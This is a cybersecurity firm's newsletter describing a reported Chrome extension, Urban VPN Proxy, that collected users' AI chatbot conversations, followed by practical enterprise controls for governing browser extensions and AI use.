April 11, 2026 Newsletter
A recent report highlighted a Chrome extension with a “Featured” badge and millions of installs that silently collected users’ AI chatbot conversations—both the prompts people typed and the answers they received.
InfoSight’s perspective: this is not “AI risk.” This is browser supply-chain risk—and it sits on the same path as credential theft, session hijacking, and data exfiltration. The difference is the data: AI chats often contain the most concentrated “good stuff” in an organization (internal context, drafts, code, customer details, operational issues, and decision-making).
What happened
The extension named in the reporting is Urban VPN Proxy, advertised as a privacy/VPN tool.
Researchers say an update released July 9, 2025 (version 5.5.0) enabled AI chat “harvesting” by default. Because extensions auto-update, users could have installed it for VPN features and later received new surveillance behavior without a clear, fresh decision.
The reported behavior targeted multiple AI platforms (including ChatGPT, Claude, Gemini, Copilot, Perplexity, and others).
The reporting also noted additional extensions from the same publisher with similar AI harvesting functionality.
A later update in the story said that by December 18, 2025, the extensions were no longer available for download from the Chrome Web Store, and by December 23, 2025, they were no longer available from Microsoft’s Edge add-ons marketplace.
How it worked (the simple version)
The researchers describe the extension injecting scripts into AI chatbot pages and then intercepting the “deliveries” by wrapping the browser’s built-in network request functions (the same core mechanisms browsers use to send/receive web traffic).
In practice, that meant:
Every time you sent an AI prompt or received an AI response, the extension could see it.
The captured content (prompts, responses, timestamps, identifiers, metadata about platform/model) could be packaged and sent out to external servers.
The story specifically referenced data exfiltration to endpoints such as analytics.urban-vpn[.]com and stats.urban-vpn[.]com.
Why the “Featured” badge matters (and why it still isn’t a safety guarantee)
Google’s own Chrome Web Store help documentation states that Featured extensions “follow technical best practices” and meet a high standard, and that the Chrome Web Store team reviews each extension before awarding the badge.
That badge can act like an implicit endorsement, which is exactly why this is important operationally: trust signals drive installs—and installs create a high-privilege foothold inside the browser.
Also relevant: Chrome’s Web Store “Limited Use” policy prohibits selling or transferring user data to data brokers and restricts collection/use to a single disclosed purpose, with strict limits on third-party transfer.
Business impact: what data is actually at risk
AI chats inside organizations routinely contain:
Internal process details (how you operate, what’s broken, what you’re changing)
Draft customer communications and proposals
Code snippets, configs, logs, architecture diagrams
Vulnerability or incident notes pasted for “analysis”
Vendor details, invoices, pricing, contracts
Identity data (names, emails, phone numbers) typed casually
The risk is not theoretical. When prompts and responses are intercepted, the loss is direct disclosure of sensitive content, often with enough context to make it actionable for extortion, fraud, or targeted intrusion.
InfoSight take: the real root cause
This incident reinforces two hard truths:
“Free” privacy tools are frequently monetized through data. If the business model isn’t clear, assume the product is the product and you are the inventory.
Browser extensions are privileged software. They can read pages, alter traffic flows, and quietly expand scope over time via updates.
Treat extensions like endpoint agents, not like harmless add-ons.
What to do now (practical controls that reduce this risk)
1) Move from “allow by default” to “allowlist by policy”
Enforce extension allowlisting for corporate browsers.
Block installation of unapproved extensions and “developer mode” installs.
Remove “everyone can install anything” as a standard user privilege.
2) Inventory and continuously monitor extensions
Maintain an up-to-date list of installed extensions by user/device.
Alert on:
newly installed extensions
permission changes
publisher changes
sudden version jumps across the fleet (auto-update wave)
3) Restrict AI usage to controlled paths
Use enterprise AI offerings / managed access methods where possible.
Segment who can use public AI chat in the browser and from which devices.
For higher-risk teams (finance, HR, engineering, executives), consider browser isolation or a dedicated “clean” browser profile with no extensions.
4) Block known-bad telemetry and suspicious egress
Use DNS / secure web gateway controls to block exfil domains when identified.
Monitor for unusual outbound connections from browser contexts.
Correlate new domains with extension installs.
5) Apply DLP and “don’t paste secrets” guardrails
Implement DLP rules for copying sensitive data into web forms where feasible.
Train explicitly on AI: “If it would be classified in email, it’s classified in a prompt.”
Treat AI prompts as a data-handling surface, not a casual scratchpad.
6) Put AI + browser extensions into your risk register
Document acceptable use for AI tools.
Document acceptable extension categories and approval process.
Require vendor transparency on data handling, retention, and third-party sharing.
Bottom line
This story is a reminder that the browser is now a primary data plane for the business—especially as AI becomes part of daily work. The operational fix is straightforward: govern extensions like software, govern AI prompts like data, and assume trust badges are not security controls.
Subscribe to our newsletter to keep you updated on the latest cybersecurity insights & resources.
One follow-up from a security expert—no spam, ever.
Enter your details below to download the PDF.